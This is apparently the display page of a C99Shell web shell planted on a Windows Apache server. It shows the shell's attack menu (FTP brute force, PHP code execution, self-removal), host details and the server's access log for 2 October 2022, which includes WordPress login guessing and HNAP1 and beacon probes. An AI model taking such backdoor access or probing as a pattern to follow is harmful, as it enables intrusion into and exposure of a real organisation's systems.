!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.10.02.log (678.14 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [01/Oct/2022:23:58:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:23:59:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
5.255.253.106 - - [02/Oct/2022:00:01:22 -0500] "-" 408 -
5.255.253.174 - - [02/Oct/2022:00:01:27 -0500] "-" 408 -
157.55.39.202 - - [02/Oct/2022:00:01:28 -0500] "GET /BLA/resoluciones/00000877.tif HTTP/1.1" 404 1018
5.45.207.133 - - [02/Oct/2022:00:01:32 -0500] "-" 408 -
87.250.224.175 - - [02/Oct/2022:00:01:37 -0500] "-" 408 -
87.250.224.4 - - [02/Oct/2022:00:01:52 -0500] "-" 408 -
213.180.203.85 - - [02/Oct/2022:00:02:07 -0500] "-" 408 -
201.245.192.253 - - [02/Oct/2022:00:02:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
87.250.224.37 - - [02/Oct/2022:00:02:37 -0500] "-" 408 -
216.245.221.92 - - [02/Oct/2022:00:03:00 -0500] "HEAD / HTTP/1.1" 200 -
5.255.253.166 - - [02/Oct/2022:00:03:37 -0500] "-" 408 -
185.216.71.182 - - [02/Oct/2022:00:03:58 -0500] "GET / HTTP/1.1" 200 319
185.216.71.182 - - [02/Oct/2022:00:04:03 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
213.180.203.3 - - [02/Oct/2022:00:04:37 -0500] "-" 408 -
40.78.53.27 - - [02/Oct/2022:00:06:01 -0500] "GET /transportadores-de-carga-conocieron-las-opciones-para-contaminar-menos-y-enrutarse-en-la-sostenibilidad.html HTTP/1.1" 200 1003
172.22.2.4 - - [02/Oct/2022:00:04:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
87.250.224.144 - - [02/Oct/2022:00:06:37 -0500] "-" 408 -
207.46.13.89 - - [02/Oct/2022:00:06:53 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS+2016%2F HTTP/1.1" 200 17179
172.22.2.4 - - [02/Oct/2022:00:05:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49101
201.245.192.253 - - [02/Oct/2022:00:07:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [02/Oct/2022:00:05:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50046
216.245.221.92 - - [02/Oct/2022:00:08:00 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.109 - - [02/Oct/2022:00:08:45 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [02/Oct/2022:00:08:47 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
87.250.224.114 - - [02/Oct/2022:00:09:37 -0500] "-" 408 -
185.119.81.109 - - [02/Oct/2022:00:10:38 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [02/Oct/2022:00:10:39 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
207.46.13.84 - - [02/Oct/2022:00:11:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20301-350/00000308.tif HTTP/1.1" 200 27540
201.245.192.253 - - [02/Oct/2022:00:12:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [02/Oct/2022:00:10:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Oct/2022:00:13:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:00:11:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
172.22.2.4 - - [02/Oct/2022:00:13:43 -0500] "GET /BLA/boletinlegal/beacon.http-get HTTP/1.1" 404 1018
152.61.192.232 - - [02/Oct/2022:00:13:52 -0500] "GET / HTTP/1.1" 200 319
185.119.81.109 - - [02/Oct/2022:00:14:51 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [02/Oct/2022:00:14:52 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
185.119.81.109 - - [02/Oct/2022:00:16:50 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [02/Oct/2022:00:16:51 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
201.245.192.253 - - [02/Oct/2022:00:17:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [02/Oct/2022:00:18:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:00:16:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:00:17:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
152.61.128.50 - - [02/Oct/2022:00:19:15 -0500] "GET / HTTP/1.1" 200 319
186.155.203.227 - - [02/Oct/2022:00:19:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
201.245.192.253 - - [02/Oct/2022:00:21:46 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:00:21:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:00:22:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
199.16.157.182 - - [02/Oct/2022:00:22:31 -0500] "GET /images/feria-17-de-septiembre_optimized.jpg HTTP/1.1" 200 40532
216.245.221.92 - - [02/Oct/2022:00:23:00 -0500] "HEAD / HTTP/1.1" 200 -
103.40.197.107 - - [02/Oct/2022:00:23:21 -0500] "POST /HNAP1/ HTTP/1.0" 400 945
172.22.2.4 - - [02/Oct/2022:00:22:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
17.121.115.245 - - [02/Oct/2022:00:24:05 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:00:23:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
207.46.13.40 - - [02/Oct/2022:00:24:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/2239.tif HTTP/1.1" 200 151894
172.22.2.4 - - [02/Oct/2022:00:26:35 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%2012%20del%2014%20de%20Marzo%20de%202019.pdf HTTP/1.1" 304 -
201.245.192.253 - - [02/Oct/2022:00:27:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
207.46.13.89 - - [02/Oct/2022:00:27:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 394468
104.196.163.91 - - [02/Oct/2022:00:27:16 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
104.196.163.91 - - [02/Oct/2022:00:27:16 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
104.196.163.91 - - [02/Oct/2022:00:27:16 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
104.196.163.91 - - [02/Oct/2022:00:27:18 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
104.196.163.91 - - [02/Oct/2022:00:27:19 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
104.196.163.91 - - [02/Oct/2022:00:27:19 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
104.196.163.91 - - [02/Oct/2022:00:27:20 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
104.196.163.91 - - [02/Oct/2022:00:27:21 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
104.196.163.91 - - [02/Oct/2022:00:27:21 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
104.196.163.91 - - [02/Oct/2022:00:27:21 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
104.196.163.91 - - [02/Oct/2022:00:27:21 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
104.196.163.91 - - [02/Oct/2022:00:27:21 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
104.196.163.91 - - [02/Oct/2022:00:27:22 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
104.196.163.91 - - [02/Oct/2022:00:27:22 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
104.196.163.91 - - [02/Oct/2022:00:27:22 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
104.196.163.91 - - [02/Oct/2022:00:27:22 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
104.196.163.91 - - [02/Oct/2022:00:27:22 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
104.196.163.91 - - [02/Oct/2022:00:27:22 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
104.196.163.91 - - [02/Oct/2022:00:27:22 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
104.196.163.91 - - [02/Oct/2022:00:27:23 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
104.196.163.91 - - [02/Oct/2022:00:27:23 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
104.196.163.91 - - [02/Oct/2022:00:27:24 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
104.196.163.91 - - [02/Oct/2022:00:27:24 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
104.196.163.91 - - [02/Oct/2022:00:27:24 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
104.196.163.91 - - [02/Oct/2022:00:27:24 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
104.196.163.91 - - [02/Oct/2022:00:27:24 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
104.196.163.91 - - [02/Oct/2022:00:27:24 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
104.196.163.91 - - [02/Oct/2022:00:27:25 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
104.196.163.91 - - [02/Oct/2022:00:27:25 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
104.196.163.91 - - [02/Oct/2022:00:27:25 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
104.196.163.91 - - [02/Oct/2022:00:27:31 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
104.196.163.91 - - [02/Oct/2022:00:27:31 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
40.94.34.39 - - [02/Oct/2022:00:27:44 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
40.94.34.79 - - [02/Oct/2022:00:27:44 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
40.94.34.42 - - [02/Oct/2022:00:27:44 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.94.34.16 - - [02/Oct/2022:00:27:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
40.94.34.16 - - [02/Oct/2022:00:27:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
40.94.34.39 - - [02/Oct/2022:00:27:44 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
40.94.34.42 - - [02/Oct/2022:00:27:44 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
40.94.34.39 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
40.94.34.16 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
40.94.34.42 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
40.94.34.16 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
40.94.34.79 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
40.94.34.16 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
40.94.34.42 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
40.94.34.39 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
40.94.34.16 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
40.94.34.42 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
40.94.34.39 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
40.94.34.16 - - [02/Oct/2022:00:27:45 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
40.94.34.16 - - [02/Oct/2022:00:27:49 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
40.94.34.39 - - [02/Oct/2022:00:27:49 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
40.94.34.16 - - [02/Oct/2022:00:27:49 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
40.94.34.42 - - [02/Oct/2022:00:27:49 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
40.94.34.79 - - [02/Oct/2022:00:27:49 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
40.94.34.76 - - [02/Oct/2022:00:27:57 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
216.245.221.92 - - [02/Oct/2022:00:28:00 -0500] "HEAD / HTTP/1.1" 200 -
199.59.150.182 - - [02/Oct/2022:00:28:29 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
40.94.34.82 - - [02/Oct/2022:00:27:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [02/Oct/2022:00:28:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.97 - - [02/Oct/2022:00:30:02 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:00:28:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
157.55.39.159 - - [02/Oct/2022:00:30:43 -0500] "GET /los-martires-recibe-la-feria-de-servicios-donde-podras-adelantar-todos-tus-tramites-ambientales.html HTTP/1.1" 200 889
207.46.13.89 - - [02/Oct/2022:00:30:45 -0500] "GET /BLA/resoluciones/AUTOS%202014/0232.pdf HTTP/1.1" 200 669316
201.245.192.253 - - [02/Oct/2022:00:31:46 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:00:31:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:00:32:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
40.94.28.66 - - [02/Oct/2022:00:32:12 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
40.94.28.74 - - [02/Oct/2022:00:32:12 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
40.94.28.41 - - [02/Oct/2022:00:32:12 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.94.28.23 - - [02/Oct/2022:00:32:12 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
40.94.28.81 - - [02/Oct/2022:00:32:12 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
40.94.28.66 - - [02/Oct/2022:00:32:12 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
40.94.28.41 - - [02/Oct/2022:00:32:12 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
40.94.28.81 - - [02/Oct/2022:00:32:12 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
40.94.28.41 - - [02/Oct/2022:00:32:12 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
40.94.28.23 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
40.94.28.74 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
40.94.28.66 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
40.94.28.23 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
40.94.28.41 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
40.94.28.66 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
40.94.28.23 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
40.94.28.41 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
40.94.28.66 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
40.94.28.23 - - [02/Oct/2022:00:32:13 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
40.94.28.74 - - [02/Oct/2022:00:32:17 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
40.94.28.23 - - [02/Oct/2022:00:32:17 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
40.94.28.81 - - [02/Oct/2022:00:32:17 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
40.94.28.66 - - [02/Oct/2022:00:32:17 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
40.94.28.41 - - [02/Oct/2022:00:32:17 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
104.196.163.91 - - [02/Oct/2022:00:32:20 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
104.196.163.91 - - [02/Oct/2022:00:32:20 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
104.196.163.91 - - [02/Oct/2022:00:32:20 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
104.196.163.91 - - [02/Oct/2022:00:32:21 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
104.196.163.91 - - [02/Oct/2022:00:32:23 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
104.196.163.91 - - [02/Oct/2022:00:32:23 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
104.196.163.91 - - [02/Oct/2022:00:32:24 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
104.196.163.91 - - [02/Oct/2022:00:32:24 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
104.196.163.91 - - [02/Oct/2022:00:32:24 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
104.196.163.91 - - [02/Oct/2022:00:32:24 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
40.94.28.75 - - [02/Oct/2022:00:32:25 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
104.196.163.91 - - [02/Oct/2022:00:32:25 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
104.196.163.91 - - [02/Oct/2022:00:32:25 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
104.196.163.91 - - [02/Oct/2022:00:32:25 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
104.196.163.91 - - [02/Oct/2022:00:32:25 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
104.196.163.91 - - [02/Oct/2022:00:32:25 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
104.196.163.91 - - [02/Oct/2022:00:32:25 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
104.196.163.91 - - [02/Oct/2022:00:32:26 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
104.196.163.91 - - [02/Oct/2022:00:32:26 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
104.196.163.91 - - [02/Oct/2022:00:32:28 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
104.196.163.91 - - [02/Oct/2022:00:32:29 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
104.196.163.91 - - [02/Oct/2022:00:32:30 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
104.196.163.91 - - [02/Oct/2022:00:32:30 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
104.196.163.91 - - [02/Oct/2022:00:32:30 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
104.196.163.91 - - [02/Oct/2022:00:32:30 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
104.196.163.91 - - [02/Oct/2022:00:32:31 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
104.196.163.91 - - [02/Oct/2022:00:32:32 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
104.196.163.91 - - [02/Oct/2022:00:32:33 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
104.196.163.91 - - [02/Oct/2022:00:32:33 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
104.196.163.91 - - [02/Oct/2022:00:32:33 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
104.196.163.91 - - [02/Oct/2022:00:32:35 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
104.196.163.91 - - [02/Oct/2022:00:32:40 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
104.196.163.91 - - [02/Oct/2022:00:32:40 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
40.94.28.70 - - [02/Oct/2022:00:32:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
199.16.157.181 - - [02/Oct/2022:00:32:53 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [02/Oct/2022:00:33:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:00:33:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
183.136.225.35 - - [02/Oct/2022:00:35:58 -0500] "GET / HTTP/1.1" 200 319
183.136.225.35 - - [02/Oct/2022:00:35:59 -0500] "GET / HTTP/1.1" 200 319
183.136.225.35 - - [02/Oct/2022:00:35:59 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [02/Oct/2022:00:34:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [02/Oct/2022:00:36:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
199.59.150.180 - - [02/Oct/2022:00:37:04 -0500] "-" 408 -
216.245.221.92 - - [02/Oct/2022:00:38:00 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.109 - - [02/Oct/2022:00:41:11 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [02/Oct/2022:00:41:12 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [02/Oct/2022:00:39:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:00:41:46 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:00:41:48 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [02/Oct/2022:00:41:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [02/Oct/2022:00:40:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
216.245.221.92 - - [02/Oct/2022:00:43:00 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.40 - - [02/Oct/2022:00:44:33 -0500] "GET /BLA/resoluciones/00001784.tif HTTP/1.1" 404 1018
201.245.192.253 - - [02/Oct/2022:00:46:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [02/Oct/2022:00:45:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
102.129.153.246 - - [02/Oct/2022:00:47:55 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
216.245.221.92 - - [02/Oct/2022:00:48:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:00:46:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
207.46.13.84 - - [02/Oct/2022:00:50:23 -0500] "GET /BLA/resoluciones/00001755.tif HTTP/1.1" 404 1018
201.245.192.253 - - [02/Oct/2022:00:51:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
207.46.13.190 - - [02/Oct/2022:00:52:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20851-900/00000871.tif HTTP/1.1" 200 135770
216.245.221.92 - - [02/Oct/2022:00:53:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:00:51:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.40 - - [02/Oct/2022:00:53:25 -0500] "GET /BLA/resoluciones/AUTOS%202022/1180.pdf HTTP/1.1" 200 435843
172.22.2.4 - - [02/Oct/2022:00:53:30 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 304 -
172.22.2.4 - - [02/Oct/2022:00:52:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
141.95.167.209 - - [02/Oct/2022:00:54:48 -0500] "GET /beacon.http-get HTTP/1.1" 404 1018
